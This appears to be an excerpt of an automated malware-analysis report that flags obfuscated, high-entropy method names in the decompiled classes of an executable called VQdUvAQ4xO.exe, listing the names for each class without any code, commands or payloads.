                              Source: VQdUvAQ4xO.exe, cHitvuleQgR9nCgPSZ8.csHigh entropy of concatenated method names: 'O0BwllD2Wo', 'WupwwlQYyK', 'P8TwcyGLZf', 'p5GaxLHJF51EQNwtqNiT', 'A77pdrHJABcpLkxHpRgy', 'axWZyvHJYB7ydhFejwJ9', 'DLjwyrOHhK', 'F3nNGbHJIjHDIlJgbu7p', 'Mo6jGuHJykU7ZwR3PT1S', 'nOvdymHJ8vwYs22KVDMa'
                              Source: VQdUvAQ4xO.exe, jopMKQ3fZcqknogkoe3.csHigh entropy of concatenated method names: 't3O3uvmFyS', 'aHD37uJvKq', 'KQb3PRYIQu', 'I9u8WGHbcChXR1CGPJ0M', 'zC3eQwHblUcayQqBGvXf', 'QvQUYKHbw2inbSrdRux3', 'PDf3XetVA1', 'MsK35QsLos', 'gFq397uuDo', 'P323KLHOQO'
                              Source: VQdUvAQ4xO.exe, JC5geYHT01ctyeDikXw.csHigh entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'BjVHYHNw0Bo', 'h0aHwHCk5w6', 'KaNSJdHVS45Tqs3SqF1y', 'h2qOtFHVloMTJUhf3YgY', 'ijJd7PHVwJ4rhOn33qyx', 'GlqcMTHVcnJvRuyjkWEP'
                              Source: VQdUvAQ4xO.exe, WRGt3tcXWkLwsIscp8T.csHigh entropy of concatenated method names: 'BEhcoHEgiU', 'PWEEmJH236NGuBlvHuNj', 'h4GdwTH2A3R5mq053vos', 'r56lQCH2YZbuHctJESHv', 'U1J', 'P9X', 'xT1HwDGxljq', 'TpmHwjBiFrC', 'p5qHYAEA1SB', 'imethod_0'
                              Source: VQdUvAQ4xO.exe, k9ecEIuI85ifNiC7AsE.csHigh entropy of concatenated method names: 'iLOuD4AtNx', 'jiauxt5b6A', 'oGOu65knkd', 'mFpus8TZaS', 'udGu45jZCQ', 'pksuEsP7fP', 'ODquv6hBkY', 'kjBu0kVx3l', 'Dispose', 'FLQcfAH7ohPbkOjd7nmX'
                              Source: VQdUvAQ4xO.exe, naTgsZEbW7HZBPjqufX.csHigh entropy of concatenated method names: 'jV8EkoQCvj', 'LRRfdmHXtWaYoOyOUmZb', 'cEoPQ5HXT7pIrbbhfvHW', 'An7qYdHXzD0akFf5Bq36', 'hTiyI1H5B3m9ouMMwUgI'
                              Source: VQdUvAQ4xO.exe, JyIasnRHQ24Vj5cslmc.csHigh entropy of concatenated method names: 'rC9', 'method_0', 'NYNHYxBnMkH', 'HwtHYUM4n3s', 'LVKT9CHf6uZdtgYWBasB', 'q7Fv6IHfsFxRtqQSeqE9', 'ggEoj0Hf4tMEkP6GLI6x', 'YlPRYlHfETeNctI0ZCMA', 'fUsLt5HfvqXwewpVdyp2', 'jQpm9QHf0hAAoOPkictS'
                              Source: VQdUvAQ4xO.exe, mBGLLCCYnT12ieI43PS.csHigh entropy of concatenated method names: 'pBrC1WeBsy', 'PgJCyhenwp', 'method_0', 'method_1', 'I27', 'c6a', 'C5p', 'XRRC8MhfXn', 'method_2', 'uc7'
                              Source: VQdUvAQ4xO.exe, FxNBUnAxYDjKtrdOhhG.csHigh entropy of concatenated method names: 'NKAAVmxBc5', 'WBpZ4PHbfuscm5eO4O22', 'NpEFaEHbMlvVJGtt6yOJ', 'AK24J7HbrNiff3VkVqbl', 'rRqB87HbmNRsdhkbstxT', 'zJpARlRjof', 'NB0A6Sf8gK', 'js1AsSEoVv', 'yOmA4QoL2K', 'WXVU2mHb2U6TkWMiPFmK'
                              Source: VQdUvAQ4xO.exe, ycBtraACpm89422Xygt.csHigh entropy of concatenated method names: 'VA1AbeoriW', 'RrBAnSmASs', 'MMZsn8Hb5QRiqY878hr0', 'gFqTm9Hb9C1d4FrO6VqV', 'WELS0SHbK64pb1QXV7tq', 's4BZDGHbaadkJx4LDV2q', 'Lar3RBHboQZtITtedCCc', 'cemEnBHbeYys0yJR3mq0', 'Raji0qHbitySBBlCBtU4'
                              Source: VQdUvAQ4xO.exe, nq1fFcbehhKkyfHOk4U.csHigh entropy of concatenated method names: 'sWHbdVh3UO', 'k6r', 'ueK', 'QH3', 'MutbQ3MchS', 'Flush', 'lD8bGRvUhe', 'bsKbu8staN', 'Write', 'jZNb7PkFx8'
                              Source: VQdUvAQ4xO.exe, mmMRh6Y1LWv9Q2RbPLA.csHigh entropy of concatenated method names: 'WVAY8sT3d5', 'JMEYICRjwc', 'MrUYq9VHVp', 'bvF2LKHnNSNZTGGyvYY8', 'R8LbANHnDZJntJ5RbxgE', 'k3WLOwHnj1pxAlfFqepX', 'Co6mKuHnZ4OCltjQxdB7', 'ppsInGHnxL7CoBknJ4qn', 'H7C90FHnU6oDp2GGRwHn', 't5ZXi2HnR2cLFAWixFI9'
                              Source: VQdUvAQ4xO.exe, YSKpBmSeRKlq4jEN5yZ.csHigh entropy of concatenated method names: 'rEllAZwYYk', 'waIP5jHpw2aZDt08jZff', 'r1IfaLHpcFf01aNhOIPg', 'J4xCEpHp3iZC68pvZysj', 'GsbBrmHpSqmEjm68SBq4', 'WwC0toHplkoyEsfmpY35', 'Wl1uHcHpAyOlkwJegBT8', 'WrgBVcHpY6Kr8RP9iSdH', 'BvWlBW06qD', 'pSblSjBJw0'
                              Source: VQdUvAQ4xO.exe, GdvWYyHqjZRr6jSFRK3.csHigh entropy of concatenated method names: 'FurHDyBmr7', 'dpYHjl1IOE', 'GNiHN1Pfw6', 'oRxMKNHhZ0EocEWobhG8', 'IWD8qUHhjtaXovVTGgn5', 'gnhkL3HhNcvBRiLGP9iF', 'oQ723oHhxYP1I5GVCtWk', 'gXsIBlHhUU8lLnmCyNvJ', 'cEVYAEHhRA5dRRInVId9'
                              Source: VQdUvAQ4xO.exe, CfYaj5YhA5tBli5e96m.csHigh entropy of concatenated method names: 'wVbYpBTlfn', 'PdgYJ5SVQk', 'eEpYCEMcHO', 'ILJY2suwMw', 'sx8YbfZ3nB', 'QACYnIMiAB', 'PDByyuHn9ajRRC246X6p', 'mou3lDHnK1MGcA6cWKGA', 'v1Np4XHnaNrmrNBJ2Dfg', 'F2fxlNHnoRL6rchkamug'
                              Source: VQdUvAQ4xO.exe, AM9r3nLCmdaDAF3q1NH.csHigh entropy of concatenated method names: 'zIdLbTC3R8', 'NdULnavxCI', 'yJVLkd020S', 'de2LO9Jwdh', 'KxCLgJw07Z', 'tfALLRX8N6', 'VOpLMpc3Vu', 'FjcLrI6lGG', 'g0ILfHWQio', 'XNALmRPOFK'
                              Source: VQdUvAQ4xO.exe, lwdyFYtZpN7dWKulhWw.csHigh entropy of concatenated method names: 'btjtpdAbaA', 'zWStJhlFMJ', 'SFrtCCFwex', 'CC6t22fIaf', 'OiOtbqJ11y', 'M1itnppaTF', 'mButk8tHDE', 'B9atO3hZdV', 'oVytg1Gown', 'LQ8tLHfqW9'
                              Source: VQdUvAQ4xO.exe, Na9tQLAFYhd7UscfDtO.csHigh entropy of concatenated method names: 'l5eAyLQ5Ci', 'B1hA8HlMNd', 'lfPidmHbWXHbHf45e7lq', 'g1gwuUHbI3Z8xiNXQAX4', 'NH5Q4IHbqdhVwSpCu06g', 'DIRYLQHbDlqFg5cvMijt', 'e2q30DHbjAb5YdfGnpBE', 'wLpWRJHbNXw8qvsYLjNA', 'BKeNJBHbZd62vo6TMXxc', 'YFKBPYHbxT8Ci1SpYgkf'
                              Source: VQdUvAQ4xO.exe, XnQyNTzGApX2rAKuOh.csHigh entropy of concatenated method names: 'WOHHHy7rHJ', 'AAlHl4T5a5', 'cnUHwBs9sb', 'ijIHcPKI7j', 'F40H3um0hQ', 'PyGHAPaiui', 'heTHFZ0OCV', 'vR4tfCHhYR5YQZTINNiu', 'igq7MhHhFXtMv06ilYBd', 'f9K91DHh16OmVhQLLpuZ'
                              Source: VQdUvAQ4xO.exe, Tfs5UeSUo5yS3iOiX2b.csHigh entropy of concatenated method names: 'Ks9S6Xtt8G', 'zlASs4LcnJ', 'AmRff5HVVkWsiTwE9ave', 'Y5JOZFHVpHWhHlrDEvIR', 'pYLvepHVJXpVx6SCm47A', 'XOTxwWHVCuJ4FYBdyrVF', 'MWgk5vHV28JhL5d6NHhV', 'np951ZHVbFQikKvG1F7Z', 'YBPFJvHVn4MHVvlM7toj'
                              Source: VQdUvAQ4xO.exe, bpMfE56IOVOCoI0aQbH.csHigh entropy of concatenated method names: 'gbP4HZBI9R', 'dBr5H4HX8miYPK911yet', 'xCOD7eHX1HcPZmgasdvt', 'i6fAnSHXyyEAacfCBqns', 'zcasVjHXIMSDZewefVBf', 'DbM6WVrfpb', 'bxa6D0iO5m', 'Eug6jGI8Nh', 'AKJ6NWjuU3', 'BYA6Zt1QKR'
                              Source: VQdUvAQ4xO.exe, AFZrvHVTqVH9bJHerlh.csHigh entropy of concatenated method names: 'pVbpB4E6ww', 'ffMpHGJqyk', 'QwfpSteBtw', 's4nplALYTf', 'WIDpwbtBNe', 'D4vpcPHEi0', 'oShWlfHKgtooRVbPMGem', 'eQmiqLHKkhj3Kb7UBmUT', 'HCto5NHKO8VsldpmQePd', 'mRZ6v6HKL7J2iXxSLg5q'
                              Source: VQdUvAQ4xO.exe, yys8L9wMLNW4S5TLULH.csHigh entropy of concatenated method names: 'WlUwt7UtAb', 'AJOk7vHCFsnmXa5hdGa0', 'eLCDP5HCAj3uioOJAUAD', 'qE20ktHCYwfqVlXXA3oL', 'r1JE3hHCITXAwxA2tuT5', 'xt7ct2HCyi9JA8RApdrG', 'XFfY4uHC89FknvM7Tt2Q', 'tB2iCBHCqWbEoyaKIwTC', 'nnyc3eUqBY', 'G7mpbRHCNjA8wnoCoMHy'
                              Source: VQdUvAQ4xO.exe, Yk59Lhnekh9RbEVxAIv.csHigh entropy of concatenated method names: 'fs0OojHim74rcXkYcsae', 'ok04WnHirC51U9UGCyCA', 'soYCtRHifN7WQtah3bmc', 'tsIndnveQ2', 'Mh9', 'method_0', 'Q6NnQtmDM4', 'xWQnGd8ot2', 'e7HnumpR5B', 'ts0n7kkDpy'
                              Source: VQdUvAQ4xO.exe, QvoAMswvvZU2wNwB9wZ.csHigh entropy of concatenated method names: 'VZq', 'KZ3', 'XA4', 'imethod_0', 'e23', 'h4qHYlXZ4aE', 'h0aHwHCk5w6', 'H6GCspHJV4HK0t5ZFA4v', 'rjEU5uHJpUIEOFM1Zhro', 'NfbDXkHJJrjlEMwTVLRj'
                              Source: VQdUvAQ4xO.exe, U8r9Ning2j2bjiQImrN.csHigh entropy of concatenated method names: 'q13', 'Sw1', 'method_0', 'rWcnMIUgES', 'zG8nrty6h6', 'L4RnfbntFw', 'yabnmO91Je', 'mKYnX0ieHh', 'CiWn5HMV9W', 'NFHxEPHisy6QnBfbnDTa'
                              Source: VQdUvAQ4xO.exe, yMQ3a62RdYnks5GJxd9.csHigh entropy of concatenated method names: 'D92bqiVrKA', 'v71kLyHeheQmXVTePjUy', 'kPdtVuHevhrG01EstdmB', 'KUtgetHe00lKlW5BKqrB', 'lNG3eDHeVNuU1jwLTKXk', 'kt5', 'Yb52scUoYG', 'ReadByte', 'get_CanRead', 'get_CanSeek'
                              Source: VQdUvAQ4xO.exe, uD7SimxVhE1yEBAO8b3.csHigh entropy of concatenated method names: 'PqRxOcmxZk', 'hVXe0cHMofCbEKkhLefK', 'qyt30xHMKSnyFGU81eE9', 'JiBuneHMajq8bPHlIire', 'xkyQjBHMedAU6ghp1H8R', 'LEIxJZR4uL', 'GoKxCCqCH4', 'LDhx2yMTSf', 'QMvUomHMmO5AKNITVMWg', 'LG3JbPHMXt5DFM5A9ntc'
                              Source: VQdUvAQ4xO.exe, VXxCxNM70RndMdMrmq2.csHigh entropy of concatenated method names: 'LRPMtpqBlQ', 'DC3MT59oOc', 't57MzKMKch', 'AhCrB1Ycdi', 'LT8rHeA7ve', 'dfprSt61qt', 'N8prlSCQZl', 'aujrw0DrND', 'IBCrc2Xiqu', 'hffr3bjkw6'
                              Source: VQdUvAQ4xO.exe, Oy8Y39Uu6BNA6NVYSd9.csHigh entropy of concatenated method names: 'w52', 'o38', 'vmethod_0', 'C9HUPtKhVp', 'RMhHYZ6vNSI', 'A3LK0fHfjAGioDcZbWmK', 'Hm55bvHfWPpA51wjuAai', 'nmLnKrHfDcNSOyKdhALx', 'o8wmnaHfNETQpLPYw21T', 'M41NmaHfZF86nWhRiUiU'
                              Source: VQdUvAQ4xO.exe, BvDSQ8EXlxDnQ607k8B.csHigh entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'bLtE9cJVuU', 'zgdEK05b9T', 'Dispose', 'D31', 'wNK'
                              Source: VQdUvAQ4xO.exe, zQWeV6HQY6tHDY3lWGr.csHigh entropy of concatenated method names: 'P9X', 'OCQHuCPHdF', 'wHPHYBlANXQ', 'imethod_0', 'FHyH7wlZ2D', 'ajBrCuHhtBPhusMdFSVp', 'g7orL8Hh7RhwOwiGv5qd', 'yWEleDHhP3SSyQwnllEt', 'DkH2aUHhTQSKjVFJIWdF', 'eWUG86Hhz7xfNxg4tXRK'
                              Source: VQdUvAQ4xO.exe, TA6E6pN24XljmposSL.csHigh entropy of concatenated method names: 'HranpMISN', 'wlyniTH02ynWhD9yER8E', 'opBXXjH0JrFYBlddFM3f', 'RC9d7hH0CsptaJOwdx5b', 'IisxlH9Dm', 'dqUUdDJZc', 'MIQRRxrdw', 'LZZ6Tnb0r', 'xgmsa4R5I', 'qWt4AkoGW'
                              Source: VQdUvAQ4xO.exe, MCS1Ds7BqwsE4F5CPXe.csHigh entropy of concatenated method names: 'IJN7wsOw0C', 'x8b7c9TQ5D', 'e28Kw1HP0rNBlPA2M46U', 'nT42vUHPhHPUeAM0jsMw', 'L4pG9xHPEvYiMwm9Xb0r', 'nL5lo5HPvV12vF8K2sG2', 'E5kxPxHPVIGd30cqX7tN', 'AhwBpXHPpPaovr69D2ct', 'bmP7SRyVvI', 'To4d2JHPRvpUBsokNaW0'
                              Source: VQdUvAQ4xO.exe, bGXEJKrkJeEQ3Se3SRP.csHigh entropy of concatenated method names: 'dDkPfaHGhw8p304F195G', 'YNRmP5HGV95O38bXAVGD', 'GQfgtsHGvjaghhMbEp7k', 'XkK9OlHG0TqCmkLKdDmi', 'DOeTJ0HGsWZ7xkCh0v55', 'SR9yu3HG4V2HPAC6SSxW', 'iWJHiEHGRF7lfncd5EnE', 'uaXtTKHG6WK6HomMmqk9'
                              Source: VQdUvAQ4xO.exe, XFGdWoSCEJPYyIxyQSd.csHigh entropy of concatenated method names: 'd2FSfvngBV', 'qmfSmhMrQC', 'drg43iHVXLboYGXEew7V', 'Gy6CI5HVf7CmYDllyv24', 'PyIDFDHVmEVPFZ45RYIQ', 'Ah2gDYHV5Ae26RDUGtQ5', 'BBaSKbyaDC', 'bnDGR2HVoS1fNdEOsgpU', 'Rb7GOMHVKo3aMjYCYmAM', 'bZNIeFHVaWl9lbN1sZb7'
                              Source: VQdUvAQ4xO.exe, mmyc9j3Ems3yKC26Wo2.csHigh entropy of concatenated method names: 'Tmm3CwIaHf', 'DLali5H2mkQRhI0ECheg', 'gg1mfpH2rdPTAcF5Q59E', 'QZiRhHH2ff9n0PHrIp8p', 'QF8mwMH2XSvZppMdMkAD', 'B2gtqKH25T7Zvfbi4wEI', 'E94', 'P9X', 'vmethod_0', 'v48HwUafkTc'
                              Source: VQdUvAQ4xO.exe, aXlPZypCcLrKIi5yI6c.csHigh entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3'
                              Source: VQdUvAQ4xO.exe, vcKPulRcLDwIrW0WGD4.csHigh entropy of concatenated method names: 'method_0', 'method_1', 'K47', 'LC1RAdLZvT', 'vmethod_0', 'fNkRYKG5In', 'YFlHYR2E50X', 'rBhRxwHfC6nYP9W5hqgL', 'ccW47DHfptLv7wJQe53e', 'd9KqV2HfJmnrqaVxpPqG'
                              Source: VQdUvAQ4xO.exe, Koet8K0ymYwxoWODX1H.csHigh entropy of concatenated method names: 'QP50IbcyRk', 'mkT0qnwxBA', 'O9Z0W4IZHh', 'QFg0DxSW88', 'mCv0j7pgr1', 'uxcY8FH5PJbaJuEw2pDD', 'R3u6jfH5uPn0WGOgVLVN', 'NqULP5H57Alrk65g2mZE', 'fDJeX2H5tpgH8CcrI8Hg', 'p2pUBOH5TnXuM3afPe8W'
                              Source: VQdUvAQ4xO.exe, bWL1i5F4yVHjNt8eQvJ.csHigh entropy of concatenated method names: 'tr54D4Hg0F51Za3jyoNI', 'VGBcY3HghSHr48mkdLHC', 'bJitZLHgV98iFdSiUuhH', 'vn0qTVt0rq', 'NYaurrHg2LciwjX18eMJ', 'QPUm3nHgJpLGLXefvXWN', 'cg49SMHgCWP6O0A1cSL6', 'f6c3gdHgbHFlQQLTXu3o', 'p77WHtayT8', 'TWkfy2Hgg0SIrCN4WJjW'
                              Source: VQdUvAQ4xO.exe, ANfuNnw23b2xZ3xGT1W.csHigh entropy of concatenated method names: 'KZ3', 'imethod_0', 'vmethod_0', 'WEuHYwEoOcw', 'h0aHwHCk5w6', 'xAWkKtHJMa9OVxMEZ7l0', 'WQnAb7HJrtpApup3opgC', 'rbi6kSHJfEMXgIDY4TNd', 'RY1mTHHJmomV6ULl2C1F', 'k944Z3HJX1MqX7nhAixR'
                              Source: VQdUvAQ4xO.exe, gBVbQHQgiGaWKiuDiaI.csHigh entropy of concatenated method names: 'WwdHY08HK0E', 'XxwH3vQscn0', 'vgftURHuK83jLQXbOMiP', 'fy4egdHu5NtCOBEYmpDJ', 'lb8brJHu95yCobIt8aQU', 'Yf9OU6HuicXG9DicufrD', 'tvTTbIHuoIb2a34P9uvL', 'Aftx3kHuerAxxoefNtV4', 'aBlB4YHudwIJ43qNxhY3', 'imethod_0'
                              Source: VQdUvAQ4xO.exe, NWpPepprKCtKuH6lYtM.csHigh entropy of concatenated method names: 'm4NpmPCmZC', 'A3TpX6wh4R', 'Xqdp5JbZ0v', 'WuBp97v7OR', 'V1qpKE9IVD', 'HH3pa7X5nE', 'fmppoaCN6H', 'bKypeVu0Oy', 'wAGpitxe0q', 'QrQpdnmIAY'
                              Source: VQdUvAQ4xO.exe, xHUCR8ciN5vM2OeLvmt.csHigh entropy of concatenated method names: 'vX4cPkFUXm', 'mfOctJ9c6n', 'UgjcTctbga', 'LuRczPk4k6', 'qWn3BuuNsl', 'itG3H8kwy8', 'vQI3Sn3ZUt', 'gL3U4WH2DxgjyLsdabt0', 'jUwaRXH2jDqMOaFvgvb5', 'Xx0ONcH2NPYX4LCVBoO3'
                              Source: VQdUvAQ4xO.exe, fmjSfCJT49s9m6BfHv2.csHigh entropy of concatenated method names: 't3WCBb7Gsw', 'UyoCHWCTmd', 'Yd7', 'wSgCSq4yrD', 'K8vClakZ6M', 'eL4CwRJqWx', 'GOxCc9lj1U', 'yWo06ZHogvh7udGunwfN', 'zjphyIHoki39GOuaYsBa', 'CHBqGWHoO3M9jZOiT6vO'
                              Source: VQdUvAQ4xO.exe, hQW0R4RDbHP2MtS1ymu.csHigh entropy of concatenated method names: 'LJZuwjHmlyB42Kol4EGq', 'EomnEdHmwanVMbOOGbmW', 'vsIVjZHmccjf6gKLdCai', 'LkJAlYHmHG2qXI1l7Zfd', 'rFgB6QHmSCqL3UiCEFoo', 'method_0', 'method_1', 'wpLRNOAhmh', 'zguRZ5X0ua', 'Ly8RxsHvDt'
                              Source: VQdUvAQ4xO.exe, EIxq4UYjl6H5a0Fuqri.csHigh entropy of concatenated method names: 'Q3OYUugmJV', 'K26eCvHnpJfhI5YI1WcP', 'TtRxIDHnJ1f4EM52hXmY', 'w06DEqHnCalnLFTL3FV1', 'LyqYZxIkEI', 'LkKItyHnERatHg8iRTBn', 'ijnNAoHnv6dQDb71yJ92', 'i3r16EHn0KLmkTrSsTan', 'Wp8QPGHnsiZ1GBm8Lqp6', 'Pyl9k8Hn48VWMaixdal5'
                              Source: VQdUvAQ4xO.exe, BUiuY2tMlAZ7EiDbGui.csHigh entropy of concatenated method names: 'WeWH32FGBuQ', 'FmIH3bMlXjs', 'h3uH3n2adFO', 'Ug3H3klMKOZ', 'PdAH3OqX9Ve', 'x2lH3g8nu4x', 'e3hH3LVbmNO', 'bscTccPUmm', 'GBFH3MuQuJs', 'hZEH3r3K6tA'
                              Source: VQdUvAQ4xO.exe, g86dPQv4y92Sj77mE3g.csHigh entropy of concatenated method names: 'X7Uvvknuk2', 'bIfv0w9Gbc', 'GhEvhLL1pA', 'zghvVWXfu6', 'QS1vpNdlaK', 'w7i75TH5OWFM8IAjjr1U', 'FIopGUH5nhvhxRRWKP7g', 'jfaGD3H5koyEMTbcB7Kk', 'AyBac3H5gk8CCWtjGa0R', 'JCdXVsH5LU3lji0Em1MX'
                              Source: VQdUvAQ4xO.exe, iXi9h8L5ocWDEJDTgWu.csHigh entropy of concatenated method names: 'ynlHYEMc8Tc', 'rsELKctqLQ', 'oIALaUjdP6', 'Pu0Loham2r', 'QhADWbHQHYPUag2lcPlL', 'dr1e1fHQSnRliJfgYuQp', 'RnhS48HQlqpDUDuCUqtC', 'SaYKOCHQwIg40bsRnknR', 'sMmdI7HQcroRdJtx8odS', 'sDhpOTHQ39Ca6AdgxkPy'
                              Source: VQdUvAQ4xO.exe, vd3HCFvQisbOe9XgSHm.csHigh entropy of concatenated method names: 'yP0vuB8rRx', 'f2uv7iGqA6', 'Bm0vPUJ4j8', 'nSuQLZH5ogjXBd54v2eG', 'cBYVu1H5eLM5nV4TqVXZ', 'vGThmkH5ifWrfND9nB8F', 'CGXT6HH5dCly0faPsfoZ', 'J8bifNH5QOKWt4trmylT'
                              Source: VQdUvAQ4xO.exe, rWjMRehlB9OQ5LxXOjy.csHigh entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'G3KhcMOejx', 'Write', 'rHjh3N2beL', 'lsThArNaRE', 'Flush', 'vl7'
                              Source: VQdUvAQ4xO.exe, X00JSaMCbyERYmsWXrA.csHigh entropy of concatenated method names: 'GQlMbQqiD7', 'uMeMneGNoy', 'yaSMk22AdQ', 'qPaMOGF47n', 'ecYMgAMtl4', 'NREMLbTtuS', 'Qc6MMWoyhM', 'QV7Mro11pV', 'DFwMfZnJoo', 'tKpMmK2qQy'
                              Source: VQdUvAQ4xO.exe, rWFTO7l0LUjBpTE7F4e.csHigh entropy of concatenated method names: 'J5Zlmxeqs8', 'uRNlXeIZjv', 'VpWl5qF4lw', 'PPd68KHpKKFZu4E6HZqs', 'x3jYCRHpaEu0w9OR6DSd', 'Dm6PaeHp5u0qlf5B9rjv', 'iRZFjLHp9JpkACs3cKsr', 'QFdlVb1IiB', 'SpslpoFGlv', 'h7ClJJsbsr'
                              Source: VQdUvAQ4xO.exe, tSYNryxQqlJ8Ze1SUAg.csHigh entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'v6SHYIMYI6e', 'dE0Hw9w4osj', 'Lir66kHrYyxANlf9VUo3', 'LJ5onZHrFmfEhNsuIMW8', 'vQHAj2Hr1KXwss2Iejf2', 'HBOlUqHryIkO5J5IQW16', 'BSd2tgHr8mIZd5reOqpO'
                              Source: VQdUvAQ4xO.exe, ciXfN6tqmX8b1O3iOug.csHigh entropy of concatenated method names: 'TicScUf9WCb', 'ol8ScR5rvDG', 'UGE7LtHtDAiZT0MBXnL9', 'xFTFK1HtjNW0TNi494Mf', 'us1IBlHtNCvHDujFbUYv', 'NHdTKgHtZrf2hbPHqvYZ', 'cohBmgHtxHk2ySlsepaU'
                              Source: VQdUvAQ4xO.exe, IACyYKAfOvk31kQ3Xli.csHigh entropy of concatenated method names: 'JRcAuAUFl6', 'Tq1A7uLYkc', 'F2Y3HlHnw1cIZs9nx6Th', 'j6mFvnHncVy2QVihCgPC', 'CSIU7CHn3AnNORuEDmDf', 'YDwAXaKsTN', 'notA5dtEXO', 'EDsA9DbTfZ', 'w3kAKis9Ps', 'SyJAaiWvP4'
                              Source: VQdUvAQ4xO.exe, hQBQP3Sc0bx5PLlNgS0.csHigh entropy of concatenated method names: 'NyuSA8mB60', 'NTgSYLaLrV', 'HTsSFwa8sC', 'WeVS132i9q', 'o7ui8VHVNIRSVEoIdvmE', 'wHxN2AHVD5UuDnuCXKPT', 'sKgk0kHVjMwMg2IOc53F', 'JE0KfnHVZSCk0eERTlKN', 'ol51bMHVxw7atWdpAbDl', 'bq4rxBHVUg3dMIefyTPW'
                              Source: VQdUvAQ4xO.exe, Fj0LRYY6MSgJJstC44o.csHigh entropy of concatenated method names: 'QCuY4hPoGA', 'd6p9LcHnkVoLhD3TtMIe', 'fRqdFZHnOVId1dYDAXlp', 'Rais2BHngIiro5cPl84i', 'BcAp3NHnbtEWrLQkRC0j', 'DuHYWmHnnyKsSdrAayB4', 'EODpFsHnLo494IrStjx1'
                              Source: VQdUvAQ4xO.exe, rgDKvwJwP7ji0dDlD5J.csHigh entropy of concatenated method names: 'wvDJ3yN2Is', 'A11JApeSFt', 'gfqJYMGmYu', 'method_0', 'method_1', 'Fc2', 'method_2', 'method_3', 'DB1', 'T6YJF6xIq5'
                              Source: VQdUvAQ4xO.exe, hZ9mBEJ54WNm3iWen6e.csHigh entropy of concatenated method names: 'SJuJKkAnvj', 'pjuJad9N4r', 'nO7JopuvyH', 'dfTJeR79Dr', 'xiFJiJ1Y2x', 'KlvmhpHovZtu2qlNrQLv', 'iGHwtAHo0Euj9upoOZWn', 'hSxI1RHohlosuRxqb4xy', 'fnITe4Ho4c3W9U6rS07m', 'buw1EwHoEuiJ1yqjQEq6'
                              Source: VQdUvAQ4xO.exe, J9wrnacnR8HA2262xbp.csHigh entropy of concatenated method names: 'l29', 'P9X', 'vmethod_0', 'XbRHwyyZ8xI', 'ycDcOCYVkm', 'imethod_0', 'dZWnMSHCKGe7RfU5b9kl', 'EqjjP6HCay7W52C7Fw6m', 'yrZ8VaHConvA6hBWGoe3', 'ubWdFgHCeMPgAc2h457n'
                              Source: VQdUvAQ4xO.exe, aKohs5QCTPGPqv43Ewe.csHigh entropy of concatenated method names: 'method_0', 'h59', 'R73', 'b4XQbgQKRA', 'OBlCF1HuZG72AJTTPPKA', 'ydI7BPHuxbIQPrCEpC6E', 'oqBwNSHuU0jKRGXR6OkO', 'PjNBg9HuRZ4AvnlbyWTZ', 'GP487wHu6VKUrD3CgTGu', 'hJ1ZoGHusMSKuU9d2A8W'
                              Source: VQdUvAQ4xO.exe, u0XmLdueBj9R9AF4QqX.csHigh entropy of concatenated method names: 'CreateFileW', 'GetFileAttributesW', 'GetFileAttributesExW', 'GetFileInformationByHandle', 'aH5udRc6YL', 'DswuQxl2hW', 'OnnuGrcGf6', 'F4UuuUI6Qm', 'RT56DrHPqD1av0UDXnkm', 'LWa1R0HP8XI8vKjLJr4b'
                              Source: VQdUvAQ4xO.exe, QkHmlS0C60SgWlaHGr4.csHigh entropy of concatenated method names: 'method_0', 'Hwx0bEVeEL', 'kns0nVprOq', 'cAu0koo0Zx', 'Lqc0O6ft3a', 'ktk0g4G5Ru', 'hFy0LTYSUv', 'q7FVXuH9cxhaUDNwf01x', 'vtdThTH93wgmrtpBwZSw', 'CkJ1g0H9Af20bVkghjNj'
                              Source: VQdUvAQ4xO.exe, d9AhtAhfG1uEY27JJ3U.csHigh entropy of concatenated method names: 'a1JhtB0PHl', 'FvQhzFFr78', 'quKhXwmqAW', 'LFEh5ZCTfX', 'hb6h9oQCX3', 'Ef3hKq6baP', 'SmahaJRvqu', 'rLxho2BpVp', 'uQZhebpx6E', 'FfbhinaffE'
                              Source: VQdUvAQ4xO.exe, QEYnNRcDaG8FKcYVH5c.csHigh entropy of concatenated method names: 'Kp2chBV7SL', 'htdcVVERZr', 'cuXcpLhqmU', 'V01OgmHCXOS2SI0S186V', 'AisgZ5HC5odJqsShmlyQ', 'mgOTkPHCfZ7CfweIOf83', 'A1niCRHCmIBBU6qxZyTr', 'TSoc4iTHIQ', 'tHecEGi9Bc', 'yKeB8QHCMhcRkuJNAf6l'
                              Source: VQdUvAQ4xO.exe, ItGJviWsGpg4pLESa9c.csHigh entropy of concatenated method names: 'lAgxIxfmh6', 'pZqxqOe4UH', 'oJiuWwHMhZvOC2RlsCca', 'tANDviHMv4CVcnbk10kM', 'JBfX23HM0yXoRu0P69ap', 'RXB5cpHMVAHBACo8yEXD', 'wT6xxEAT7c', 'SxOxvPHMJUoNRJ1vn1oI', 'SCfkhJHMCnFknnhXiHAp', 'wNJ5lUHM2SWyHsXUdkax'
                              Source: VQdUvAQ4xO.exe, BLuQioxL94kuAm3E3A2.csHigh entropy of concatenated method names: 'QP4x9g7Ee4', 'lJbxKDFT00', 'pvPxaqcm5t', 'p9wjYbHMPf8bGNth4tEK', 'gB2RZBHMtf6ouHioyB6N', 'XxPMZrHMTJ2aG4BavlIZ', 'FhaxrjueT5', 'sQgxft51qu', 'u5uxmVaiVi', 'NrdsjAHMdkDrxVWB1k6Z'
                              Source: VQdUvAQ4xO.exe, Ko9syTuCMIiR29WW3UQ.csHigh entropy of concatenated method names: 'YZPubR6T8H', 'x40unWabju', 'vaUuk3vmAd', 'bFduO9efc2', 'Dispose', 'qJL3L4H7TtMNCECkSTNV', 'uLca39H7Pa8oipN7M58p', 'jIGcdMH7tiYZes3JNa9U', 'NSpQWGH7zh6virGsjE9l', 'ymgMv9HPBRSgwAXJJjWH'
                              Source: VQdUvAQ4xO.exe, NIfxCKXiPqH0dytly9.csHigh entropy of concatenated method names: 'IndexOf', 'Insert', 'RemoveAt', 'get_Item', 'set_Item', 'method_2', 'Add', 'Clear', 'Contains', 'QL19oQmeY'
